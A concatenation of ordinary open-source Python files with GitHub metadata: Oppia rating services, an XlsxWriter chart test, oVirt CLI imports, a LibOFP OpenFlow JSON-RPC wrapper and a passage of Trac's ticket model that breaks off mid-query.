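# token queue so the first step can finish. The numbers are placeholders.
def _init_tokens_example():
    replicas_to_aggregate = 50
    total_num_replicas = 40  # 10 fewer workers than gradients needed per step
    tokens_needed = replicas_to_aggregate - total_num_replicas  # 10
    num_tokens = replicas_to_aggregate  # the default used when num_tokens == -1
    assert num_tokens >= tokens_needed
    return num_tokens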
|
{
"content_hash": "9426ab60ec4db7c218237d10d17ab83e",
"timestamp": "",
"source": "github",
"line_count": 485,
"max_line_length": 98,
"avg_line_length": 42.228865979381446,
"alnum_prop": 0.6862946145207753,
"repo_name": "paolodedios/tensorflow",
"id": "23b5f32b0b147ea74c949a5440c837b96bfb4e6a",
"size": "21171",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/sync_replicas_optimizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1387968"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "125994873"
},
{
"name": "CMake",
"bytes": "182324"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416133"
},
{
"name": "Go",
"bytes": "2129888"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074438"
},
{
"name": "Jupyter Notebook",
"bytes": "792906"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11402294"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "172666"
},
{
"name": "Objective-C++",
"bytes": "300208"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42775737"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "621520"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14625"
},
{
"name": "Starlark",
"bytes": "7727119"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
}
|
"""System for assigning and displaying ratings of explorations."""
import datetime
from core.domain import event_services
from core.domain import exp_services
from core.platform import models
import feconf
(exp_models, user_models,) = models.Registry.import_models([
models.NAMES.exploration, models.NAMES.user])
transaction_services = models.Registry.import_transaction_services()
ALLOWED_RATINGS = [1, 2, 3, 4, 5]
def assign_rating_to_exploration(user_id, exploration_id, new_rating):
"""Records the rating awarded by the user to the exploration in both the
user-specific data and exploration summary.
It validates the exploration id but not the user id.
- 'new_rating' should be an integer between 1 and 5
"""
if not isinstance(new_rating, int):
raise ValueError(
'Expected the rating to be an integer, received %s' % new_rating)
if new_rating not in ALLOWED_RATINGS:
raise ValueError('Expected a rating 1-5, received %s.' % new_rating)
try:
exp_services.get_exploration_by_id(exploration_id)
except:
raise Exception('Invalid exploration id %s' % exploration_id)
def _update_user_rating():
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
if exp_user_data_model:
old_rating = exp_user_data_model.rating
else:
old_rating = None
exp_user_data_model = user_models.ExplorationUserDataModel.create(
user_id, exploration_id)
exp_user_data_model.rating = new_rating
exp_user_data_model.rated_on = datetime.datetime.utcnow()
exp_user_data_model.put()
return old_rating
old_rating = transaction_services.run_in_transaction(_update_user_rating)
exploration_summary = exp_services.get_exploration_summary_by_id(
exploration_id)
if not exploration_summary.ratings:
exploration_summary.ratings = feconf.get_empty_ratings()
exploration_summary.ratings[str(new_rating)] += 1
if old_rating:
exploration_summary.ratings[str(old_rating)] -= 1
event_services.RateExplorationEventHandler.record(
exploration_id, user_id, new_rating, old_rating)
exploration_summary.scaled_average_rating = (
exp_services.get_scaled_average_rating(
exploration_summary.ratings))
exp_services.save_exploration_summary(exploration_summary)
def get_user_specific_rating_for_exploration(user_id, exploration_id):
"""
Returns:
An integer 1-5, or None if there is no rating of this exploration by
this user.
"""
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
return exp_user_data_model.rating if exp_user_data_model else None
def get_when_exploration_rated(user_id, exploration_id):
"""Returns the date-time the exploration was lasted rated by this user, or
None if no such rating has been awarded.
Currently this function is only used for testing since the times ratings
were awarded are not used for anything.
"""
exp_user_data_model = user_models.ExplorationUserDataModel.get(
user_id, exploration_id)
return exp_user_data_model.rated_on if exp_user_data_model else None
def get_overall_ratings_for_exploration(exploration_id):
exp_summary = exp_services.get_exploration_summary_by_id(exploration_id)
return exp_summary.ratings
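# --- Illustrative sketch, not part of the original module ---
# A typical call sequence with placeholder ids; it assumes a normal Oppia
# runtime where the exploration exists, otherwise
# assign_rating_to_exploration() raises.
def _rating_example(user_id='user_id_placeholder', exp_id='exp_id_placeholder'):
    assign_rating_to_exploration(user_id, exp_id, 4)
    user_rating = get_user_specific_rating_for_exploration(user_id, exp_id)  # 4
    overall = get_overall_ratings_for_exploration(exp_id)  # e.g. {'1': 0, ..., '4': 1}
    return user_rating, overall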
|
{
"content_hash": "dbbbba217272298b613d5ae7ba3e8d0b",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 78,
"avg_line_length": 36.578947368421055,
"alnum_prop": 0.6975539568345324,
"repo_name": "MaximLich/oppia",
"id": "0bb75814120eac39cac34bf489c86d7a37ce54fc",
"size": "4098",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "core/domain/rating_services.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "88445"
},
{
"name": "HTML",
"bytes": "734882"
},
{
"name": "JavaScript",
"bytes": "2302526"
},
{
"name": "Python",
"bytes": "2599422"
},
{
"name": "Shell",
"bytes": "45916"
}
],
"symlink_target": ""
}
|
from .utilities import normalize, cross_val_score, add_intercept
__all__ = ['normalize', 'cross_val_score', 'add_intercept']
|
{
"content_hash": "ba5b2461e43340b613b05edb4cc7dfe4",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 64,
"avg_line_length": 42,
"alnum_prop": 0.7142857142857143,
"repo_name": "bhillmann/koko",
"id": "c4f238ae426d2f6e709a3e5a43c69186ef34f442",
"size": "126",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "koko/utils/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "468147"
},
{
"name": "Python",
"bytes": "6876"
}
],
"symlink_target": ""
}
|
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_crossing02.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [43812352, 43814272]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
chart.set_x_axis({'crossing': 3})
chart.set_y_axis({'crossing': 8})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
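# --- Illustrative sketch, not part of the original test ---
# The same axis-crossing options exercised above, outside the comparison-test
# harness; the output filename is a placeholder.
def _crossing_demo(filename='demo_crossing.xlsx'):
    workbook = Workbook(filename)
    worksheet = workbook.add_worksheet()
    worksheet.write_column('A1', [1, 2, 3, 4, 5])
    chart = workbook.add_chart({'type': 'column'})
    chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
    chart.set_x_axis({'crossing': 3})  # the y axis crosses at category 3
    chart.set_y_axis({'crossing': 8})  # the x axis crosses at value 8
    worksheet.insert_chart('E9', chart)
    workbook.close()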
|
{
"content_hash": "01845ed209ae8d305031809862e91237",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 68,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.5693877551020409,
"repo_name": "jkyeung/XlsxWriter",
"id": "23dd0b815240895d7598921a5c3103f056a7d786",
"size": "1643",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xlsxwriter/test/comparison/test_chart_crossing02.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5113"
},
{
"name": "CSS",
"bytes": "16544"
},
{
"name": "HTML",
"bytes": "13100"
},
{
"name": "Makefile",
"bytes": "7819"
},
{
"name": "Perl",
"bytes": "3504"
},
{
"name": "Python",
"bytes": "2430294"
},
{
"name": "Shell",
"bytes": "6064"
}
],
"symlink_target": ""
}
|
from ovirtcli.command.action import ActionCommand
from ovirtcli.command.add import AddCommand
from ovirtcli.command.connect import ConnectCommand
from ovirtcli.command.console import ConsoleCommand
from ovirtcli.command.remove import RemoveCommand
from ovirtcli.command.disconnect import DisconnectCommand
from ovirtcli.command.help import HelpCommand
from ovirtcli.command.list import ListCommand
from ovirtcli.command.ping import PingCommand
from ovirtcli.command.show import ShowCommand
from ovirtcli.command.status import StatusCommand
from ovirtcli.command.update import UpdateCommand
from ovirtcli.command.history import HistoryCommand
|
{
"content_hash": "e35ae008ade34cd3154b15d5ed6bb908",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 57,
"avg_line_length": 49.38461538461539,
"alnum_prop": 0.8785046728971962,
"repo_name": "oVirt/ovirt-engine-cli",
"id": "fb2b847dedb61387c72fb4a9990c7ece97c1e881",
"size": "643",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ovirtcli/command/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "870"
},
{
"name": "Python",
"bytes": "365026"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
}
|
"""
Simple Python Wrapper for LibOFP.
No external dependencies; uses builtin json module.
"""
import json
import os
import struct
import subprocess
import sys
def getDefaultPort():
try:
return int(os.environ.get('LIBOFP_DEFAULT_PORT'))
except:
return 6653
DEFAULT_OPENFLOW_PORT = getDefaultPort()
class _JsonObject:
def __init__(self, d):
self.__dict__ = d
def __repr__(self):
return str(self.__dict__)
class LibOFP(object):
"""
    Implements a Python driver for LibOFP.
Example:
ofp = libofp.LibOFP()
for event in ofp:
if event.method == 'OFP.MESSAGE' and event.params.type == 'PACKET_IN':
handlePacketIn(ofp, event)
To send a message:
ofp.send({
'type': 'BARRIER_REQUEST',
'datapath_id': datapath
})
"""
def __init__(self, driverPath='/usr/local/bin/libofp',
openflowAddr=('', DEFAULT_OPENFLOW_PORT),
listen=True):
"""
Open a connection to the driver and prepare to receive events.
openflowAddr - Address for OpenFlow driver to listen on. Specified
as a 2-tuple (host, port). Specify host of '' for all
local addresses.
"""
self._sockInput = None
self._sockOutput = None
self._process = None
self._openDriver(driverPath)
self._xid = 2
self._sendDescriptionRequest()
if listen:
self._sendListenRequest(openflowAddr)
def _openDriver(self, driverPath):
assert driverPath
# Driver's path is specified, so launch the executable.
# Communicate with the driver using stdin and stdout (in binary mode).
self._process = subprocess.Popen([driverPath, 'jsonrpc', '--loglevel=info', '--binary-protocol'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)
# Our input is the other process's stdout.
self._sockInput = self._process.stdout
self._sockOutput = self._process.stdin
def __del__(self):
if self._sockInput:
self._sockInput.close()
if self._sockOutput and self._sockOutput is not self._sockInput:
self._sockOutput.close()
def send(self, params):
self._call('OFP.SEND', id=None, **params)
def __iter__(self):
return self
def __next__(self):
line = _read_next(self._sockInput)
if not line:
raise StopIteration()
return json.loads(line, object_hook=_JsonObject)
def _call(self, method, id=None, **params):
rpc = {
'method': method,
'params': params
}
if id is not None:
rpc['id'] = id
if method == 'OFP.SEND' and 'xid' not in params:
params['xid'] = self._xid
self._xid += 1
self._write(json.dumps(rpc).encode('utf-8'))
def _sendListenRequest(self, openflowAddr):
self._call('OFP.LISTEN', endpoint='[%s]:%d' % openflowAddr, options=['FEATURES_REQ'])
def _sendDescriptionRequest(self):
self._call('OFP.DESCRIPTION', id=99999)
msg = next(self)
print(msg, file=sys.stderr)
assert msg.id == 99999
assert msg.result.api_version == '0.9'
assert len(msg.result.sw_desc) > 0
assert msg.result.versions == [1, 2, 3, 4, 5, 6]
def _write(self, msg):
hdr = struct.pack('>L', (len(msg) << 8) | 0xF5)
self._sockOutput.write(hdr + msg)
def _read_next(stream):
"""Read next event from stream.
"""
hdr, = struct.unpack('>L', stream.read(4))
assert (hdr & 0xFF) == 0xF5
result = stream.read(hdr >> 8)
print('>>> %s' % result)
return result
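# --- Illustrative sketch, not part of the original module ---
# The length-prefixed framing used by _write() and _read_next(): a 4-byte
# big-endian header whose low byte is the 0xF5 marker and whose upper 24 bits
# carry the payload length. The payload below is a placeholder message.
def _framing_example():
    payload = b'{"method":"OFP.SEND","params":{}}'
    hdr = struct.pack('>L', (len(payload) << 8) | 0xF5)  # what _write() prepends
    value, = struct.unpack('>L', hdr)                    # what _read_next() decodes
    assert value & 0xFF == 0xF5 and value >> 8 == len(payload)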
|
{
"content_hash": "659eaa45064ffe03ab8cdd1958b17cb9",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 105,
"avg_line_length": 27.02836879432624,
"alnum_prop": 0.5657307793230123,
"repo_name": "byllyfish/oftr",
"id": "965c5594d351538fa51dd396144b20187dea97ed",
"size": "3811",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/python/libofp_json.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2989"
},
{
"name": "C++",
"bytes": "2157366"
},
{
"name": "CMake",
"bytes": "42760"
},
{
"name": "Dockerfile",
"bytes": "2897"
},
{
"name": "Go",
"bytes": "1531"
},
{
"name": "Python",
"bytes": "21034"
},
{
"name": "Shell",
"bytes": "18878"
}
],
"symlink_target": ""
}
|
from __future__ import with_statement
import re
from datetime import datetime
from trac.attachment import Attachment
from trac.core import TracError
from trac.resource import Resource, ResourceNotFound
from trac.ticket.api import TicketSystem
from trac.util import embedded_numbers, partition
from trac.util.text import empty
from trac.util.datefmt import from_utimestamp, to_utimestamp, utc, utcmax
from trac.util.translation import _
__all__ = ['Ticket', 'Type', 'Status', 'Resolution', 'Priority', 'Severity',
'Component', 'Milestone', 'Version', 'group_milestones']
def _fixup_cc_list(cc_value):
"""Fix up cc list separators and remove duplicates."""
cclist = []
for cc in re.split(r'[;,\s]+', cc_value):
if cc and cc not in cclist:
cclist.append(cc)
return ', '.join(cclist)
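# Illustrative example (not part of the original module): the call
#   _fixup_cc_list('joe@example.org; anne@example.org,, joe@example.org')
# returns 'joe@example.org, anne@example.org' -- separators are normalized to
# ', ' and duplicates are dropped while keeping first-seen order.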
class Ticket(object):
# Fields that must not be modified directly by the user
protected_fields = ('resolution', 'status', 'time', 'changetime')
@staticmethod
def id_is_valid(num):
return 0 < int(num) <= 1L << 31
# 0.11 compatibility
time_created = property(lambda self: self.values.get('time'))
time_changed = property(lambda self: self.values.get('changetime'))
def __init__(self, env, tkt_id=None, db=None, version=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.env = env
if tkt_id is not None:
tkt_id = int(tkt_id)
self.resource = Resource('ticket', tkt_id, version)
self.fields = TicketSystem(self.env).get_ticket_fields()
self.std_fields, self.custom_fields, self.time_fields = [], [], []
for f in self.fields:
if f.get('custom'):
self.custom_fields.append(f['name'])
else:
self.std_fields.append(f['name'])
if f['type'] == 'time':
self.time_fields.append(f['name'])
self.values = {}
if tkt_id is not None:
self._fetch_ticket(tkt_id)
else:
self._init_defaults()
self.id = None
self._old = {}
exists = property(lambda self: self.id is not None)
def _init_defaults(self):
for field in self.fields:
default = None
if field['name'] in self.protected_fields:
# Ignore for new - only change through workflow
pass
elif not field.get('custom'):
default = self.env.config.get('ticket',
'default_' + field['name'])
else:
default = field.get('value')
options = field.get('options')
if default and options and default not in options:
try:
default = options[int(default)]
except (ValueError, IndexError):
self.env.log.warning('Invalid default value "%s" '
'for custom field "%s"'
% (default, field['name']))
if default:
self.values.setdefault(field['name'], default)
def _fetch_ticket(self, tkt_id):
row = None
if self.id_is_valid(tkt_id):
# Fetch the standard ticket fields
for row in self.env.db_query("SELECT %s FROM ticket WHERE id=%%s" %
','.join(self.std_fields), (tkt_id,)):
break
if not row:
raise ResourceNotFound(_("Ticket %(id)s does not exist.",
id=tkt_id), _("Invalid ticket number"))
self.id = tkt_id
for i, field in enumerate(self.std_fields):
value = row[i]
if field in self.time_fields:
self.values[field] = from_utimestamp(value)
elif value is None:
self.values[field] = empty
else:
self.values[field] = value
# Fetch custom fields if available
for name, value in self.env.db_query("""
SELECT name, value FROM ticket_custom WHERE ticket=%s
""", (tkt_id,)):
if name in self.custom_fields:
if value is None:
self.values[name] = empty
else:
self.values[name] = value
def __getitem__(self, name):
return self.values.get(name)
def __setitem__(self, name, value):
"""Log ticket modifications so the table ticket_change can be updated
"""
if name in self.values and self.values[name] == value:
return
if name not in self._old: # Changed field
self._old[name] = self.values.get(name)
elif self._old[name] == value: # Change of field reverted
del self._old[name]
if value:
if isinstance(value, list):
raise TracError(_("Multi-values fields not supported yet"))
field = [field for field in self.fields if field['name'] == name]
if field and field[0].get('type') != 'textarea':
value = value.strip()
self.values[name] = value
def get_value_or_default(self, name):
"""Return the value of a field or the default value if it is undefined
"""
try:
value = self.values[name]
return value if value is not empty else self.get_default(name)
except KeyError:
pass
def get_default(self, name):
"""Return the default value of a field."""
field = [field for field in self.fields if field['name'] == name]
if field:
return field[0].get('value', '')
def populate(self, values):
"""Populate the ticket with 'suitable' values from a dictionary"""
field_names = [f['name'] for f in self.fields]
for name in [name for name in values.keys() if name in field_names]:
self[name] = values.get(name, '')
# We have to do an extra trick to catch unchecked checkboxes
for name in [name for name in values.keys() if name[9:] in field_names
and name.startswith('checkbox_')]:
if name[9:] not in values:
self[name[9:]] = '0'
def insert(self, when=None, db=None):
"""Add ticket to database.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, 'Cannot insert an existing ticket'
if 'cc' in self.values:
self['cc'] = _fixup_cc_list(self.values['cc'])
# Add a timestamp
if when is None:
when = datetime.now(utc)
self.values['time'] = self.values['changetime'] = when
# The owner field defaults to the component owner
if self.values.get('owner') == '< default >':
default_to_owner = ''
if self.values.get('component'):
try:
component = Component(self.env, self['component'])
default_to_owner = component.owner # even if it's empty
except ResourceNotFound:
# No such component exists
pass
# If the current owner is "< default >", we need to set it to
# _something_ else, even if that something else is blank.
self['owner'] = default_to_owner
# Perform type conversions
values = dict(self.values)
for field in self.time_fields:
if field in values:
values[field] = to_utimestamp(values[field])
# Insert ticket record
std_fields = []
custom_fields = []
for f in self.fields:
fname = f['name']
if fname in self.values:
if f.get('custom'):
custom_fields.append(fname)
else:
std_fields.append(fname)
with self.env.db_transaction as db:
cursor = db.cursor()
cursor.execute("INSERT INTO ticket (%s) VALUES (%s)"
% (','.join(std_fields),
','.join(['%s'] * len(std_fields))),
[values[name] for name in std_fields])
tkt_id = db.get_last_id(cursor, 'ticket')
# Insert custom fields
if custom_fields:
db.executemany(
"""INSERT INTO ticket_custom (ticket, name, value)
VALUES (%s, %s, %s)
""",
[(tkt_id, c, self[c]) for c in custom_fields])
self.id = tkt_id
self.resource = self.resource(id=tkt_id)
self._old = {}
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_created(self)
return self.id
def save_changes(self, author=None, comment=None, when=None, db=None,
cnum='', replyto=None):
"""
Store ticket changes in the database. The ticket must already exist in
the database. Returns False if there were no changes to save, True
otherwise.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
:since 1.0: the `cnum` parameter is deprecated, and threading should
be controlled with the `replyto` argument
"""
assert self.exists, "Cannot update a new ticket"
if 'cc' in self.values:
self['cc'] = _fixup_cc_list(self.values['cc'])
props_unchanged = all(self.values.get(k) == v for k, v in self._old.iteritems())
if (not comment or not comment.strip()) and props_unchanged:
return False # Not modified
if when is None:
when = datetime.now(utc)
when_ts = to_utimestamp(when)
if 'component' in self.values:
# If the component is changed on a 'new' ticket
# then owner field is updated accordingly. (#623).
if self.values.get('status') == 'new' \
and 'component' in self._old \
and 'owner' not in self._old:
try:
old_comp = Component(self.env, self._old['component'])
old_owner = old_comp.owner or ''
current_owner = self.values.get('owner') or ''
if old_owner == current_owner:
new_comp = Component(self.env, self['component'])
if new_comp.owner:
self['owner'] = new_comp.owner
except TracError:
# If the old component has been removed from the database
# we just leave the owner as is.
pass
with self.env.db_transaction as db:
db("UPDATE ticket SET changetime=%s WHERE id=%s",
(when_ts, self.id))
# find cnum if it isn't provided
if not cnum:
num = 0
for ts, old in db("""
SELECT DISTINCT tc1.time, COALESCE(tc2.oldvalue,'')
FROM ticket_change AS tc1
LEFT OUTER JOIN ticket_change AS tc2
ON tc2.ticket=%s AND tc2.time=tc1.time
AND tc2.field='comment'
WHERE tc1.ticket=%s ORDER BY tc1.time DESC
""", (self.id, self.id)):
# Use oldvalue if available, else count edits
try:
num += int(old.rsplit('.', 1)[-1])
break
except ValueError:
num += 1
cnum = str(num + 1)
if replyto:
cnum = '%s.%s' % (replyto, cnum)
# store fields
for name in self._old.keys():
if name in self.custom_fields:
for row in db("""SELECT * FROM ticket_custom
WHERE ticket=%s and name=%s
""", (self.id, name)):
db("""UPDATE ticket_custom SET value=%s
WHERE ticket=%s AND name=%s
""", (self[name], self.id, name))
break
else:
db("""INSERT INTO ticket_custom (ticket,name,value)
VALUES(%s,%s,%s)
""", (self.id, name, self[name]))
else:
db("UPDATE ticket SET %s=%%s WHERE id=%%s"
% name, (self[name], self.id))
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s, %s, %s, %s, %s, %s)
""", (self.id, when_ts, author, name, self._old[name],
self[name]))
# always save comment, even if empty
# (numbering support for timeline)
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,'comment',%s,%s)
""", (self.id, when_ts, author, cnum, comment))
old_values = self._old
self._old = {}
self.values['changetime'] = when
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_changed(self, comment, author, old_values)
return int(cnum.rsplit('.', 1)[-1])
def get_changelog(self, when=None, db=None):
"""Return the changelog as a list of tuples of the form
(time, author, field, oldvalue, newvalue, permanent).
While the other tuple elements are quite self-explanatory,
the `permanent` flag is used to distinguish collateral changes
that are not yet immutable (like attachments, currently).
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
sid = str(self.id)
when_ts = to_utimestamp(when)
if when_ts:
sql = """
SELECT time, author, field, oldvalue, newvalue, 1 AS permanent
FROM ticket_change WHERE ticket=%s AND time=%s
UNION
SELECT time, author, 'attachment', null, filename,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s AND time=%s
UNION
SELECT time, author, 'comment', null, description,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s AND time=%s
ORDER BY time,permanent,author
"""
args = (self.id, when_ts, sid, when_ts, sid, when_ts)
else:
sql = """
SELECT time, author, field, oldvalue, newvalue, 1 AS permanent
FROM ticket_change WHERE ticket=%s
UNION
SELECT time, author, 'attachment', null, filename,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s
UNION
SELECT time, author, 'comment', null, description,
0 AS permanent
FROM attachment WHERE type='ticket' AND id=%s
ORDER BY time,permanent,author
"""
args = (self.id, sid, sid)
return [(from_utimestamp(t), author, field, oldvalue or '',
newvalue or '', permanent)
for t, author, field, oldvalue, newvalue, permanent in
self.env.db_query(sql, args)]
def delete(self, db=None):
"""Delete the ticket.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with self.env.db_transaction as db:
Attachment.delete_all(self.env, 'ticket', self.id, db)
db("DELETE FROM ticket WHERE id=%s", (self.id,))
db("DELETE FROM ticket_change WHERE ticket=%s", (self.id,))
db("DELETE FROM ticket_custom WHERE ticket=%s", (self.id,))
for listener in TicketSystem(self.env).change_listeners:
listener.ticket_deleted(self)
def get_change(self, cnum=None, cdate=None, db=None):
"""Return a ticket change by its number or date.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
cdate = from_utimestamp(row[0])
ts = to_utimestamp(cdate)
fields = {}
change = {'date': cdate, 'fields': fields}
for field, author, old, new in self.env.db_query("""
SELECT field, author, oldvalue, newvalue
FROM ticket_change WHERE ticket=%s AND time=%s
""", (self.id, ts)):
fields[field] = {'author': author, 'old': old, 'new': new}
if field == 'comment':
change['author'] = author
elif not field.startswith('_'):
change.setdefault('author', author)
if fields:
return change
def delete_change(self, cnum=None, cdate=None):
"""Delete a ticket change identified by its number or date."""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
cdate = from_utimestamp(row[0])
ts = to_utimestamp(cdate)
with self.env.db_transaction as db:
# Find modified fields and their previous value
fields = [(field, old, new)
for field, old, new in db("""
SELECT field, oldvalue, newvalue FROM ticket_change
WHERE ticket=%s AND time=%s
""", (self.id, ts))
if field != 'comment' and not field.startswith('_')]
for field, oldvalue, newvalue in fields:
# Find the next change
for next_ts, in db("""SELECT time FROM ticket_change
WHERE ticket=%s AND time>%s AND field=%s
LIMIT 1
""", (self.id, ts, field)):
# Modify the old value of the next change if it is equal
# to the new value of the deleted change
db("""UPDATE ticket_change SET oldvalue=%s
WHERE ticket=%s AND time=%s AND field=%s
AND oldvalue=%s
""", (oldvalue, self.id, next_ts, field, newvalue))
break
else:
# No next change, edit ticket field
if field in self.custom_fields:
db("""UPDATE ticket_custom SET value=%s
WHERE ticket=%s AND name=%s
""", (oldvalue, self.id, field))
else:
db("UPDATE ticket SET %s=%%s WHERE id=%%s"
% field, (oldvalue, self.id))
# Delete the change
db("DELETE FROM ticket_change WHERE ticket=%s AND time=%s",
(self.id, ts))
# Fix the last modification time
# Work around MySQL ERROR 1093 with the same table for the update
# target and the subquery FROM clause
db("""UPDATE ticket SET changetime=(
SELECT time FROM ticket_change WHERE ticket=%s
UNION
SELECT time FROM (
SELECT time FROM ticket WHERE id=%s LIMIT 1) AS t
ORDER BY time DESC LIMIT 1)
WHERE id=%s
""", (self.id, self.id, self.id))
self._fetch_ticket(self.id)
def modify_comment(self, cdate, author, comment, when=None):
"""Modify a ticket comment specified by its date, while keeping a
history of edits.
"""
ts = to_utimestamp(cdate)
if when is None:
when = datetime.now(utc)
when_ts = to_utimestamp(when)
with self.env.db_transaction as db:
# Find the current value of the comment
old_comment = False
for old_comment, in db("""
SELECT newvalue FROM ticket_change
WHERE ticket=%s AND time=%s AND field='comment'
""", (self.id, ts)):
break
if comment == (old_comment or ''):
return
# Comment history is stored in fields named "_comment%d"
# Find the next edit number
fields = db("""SELECT field FROM ticket_change
WHERE ticket=%%s AND time=%%s AND field %s
""" % db.like(),
(self.id, ts, db.like_escape('_comment') + '%'))
rev = max(int(field[8:]) for field, in fields) + 1 if fields else 0
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,%s,%s,%s)
""", (self.id, ts, author, '_comment%d' % rev,
old_comment or '', str(when_ts)))
if old_comment is False:
# There was no comment field, add one, find the original author
# in one of the other changed fields
old_author = None
for old_author, in db("""
SELECT author FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts, db.like_escape('_') + '%')):
db("""INSERT INTO ticket_change
(ticket,time,author,field,oldvalue,newvalue)
VALUES (%s,%s,%s,'comment','',%s)
""", (self.id, ts, old_author, comment))
else:
db("""UPDATE ticket_change SET newvalue=%s
WHERE ticket=%s AND time=%s AND field='comment'
""", (comment, self.id, ts))
# Update last changed time
db("UPDATE ticket SET changetime=%s WHERE id=%s",
(when_ts, self.id))
self.values['changetime'] = when
def get_comment_history(self, cnum=None, cdate=None, db=None):
"""Retrieve the edit history of a comment identified by its number or
date.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if cdate is None:
row = self._find_change(cnum)
if not row:
return
ts0, author0, last_comment = row
else:
ts0, author0, last_comment = to_utimestamp(cdate), None, None
with self.env.db_query as db:
# Get last comment and author if not available
if last_comment is None:
last_comment = ''
for author0, last_comment in db("""
SELECT author, newvalue FROM ticket_change
WHERE ticket=%s AND time=%s AND field='comment'
""", (self.id, ts0)):
break
if author0 is None:
for author0, last_comment in db("""
SELECT author, newvalue FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts0, db.like_escape('_') + '%')):
break
else:
return
# Get all fields of the form "_comment%d"
rows = db("""SELECT field, author, oldvalue, newvalue
FROM ticket_change
WHERE ticket=%%s AND time=%%s AND field %s
""" % db.like(),
(self.id, ts0, db.like_escape('_comment') + '%'))
rows = sorted((int(field[8:]), author, old, new)
for field, author, old, new in rows)
history = []
for rev, author, comment, ts in rows:
history.append((rev, from_utimestamp(long(ts0)), author0,
comment))
ts0, author0 = ts, author
history.sort()
rev = history[-1][0] + 1 if history else 0
history.append((rev, from_utimestamp(long(ts0)), author0,
last_comment))
return history
def _find_change(self, cnum):
"""Find a comment by its number."""
scnum = str(cnum)
with self.env.db_query as db:
for row in db("""
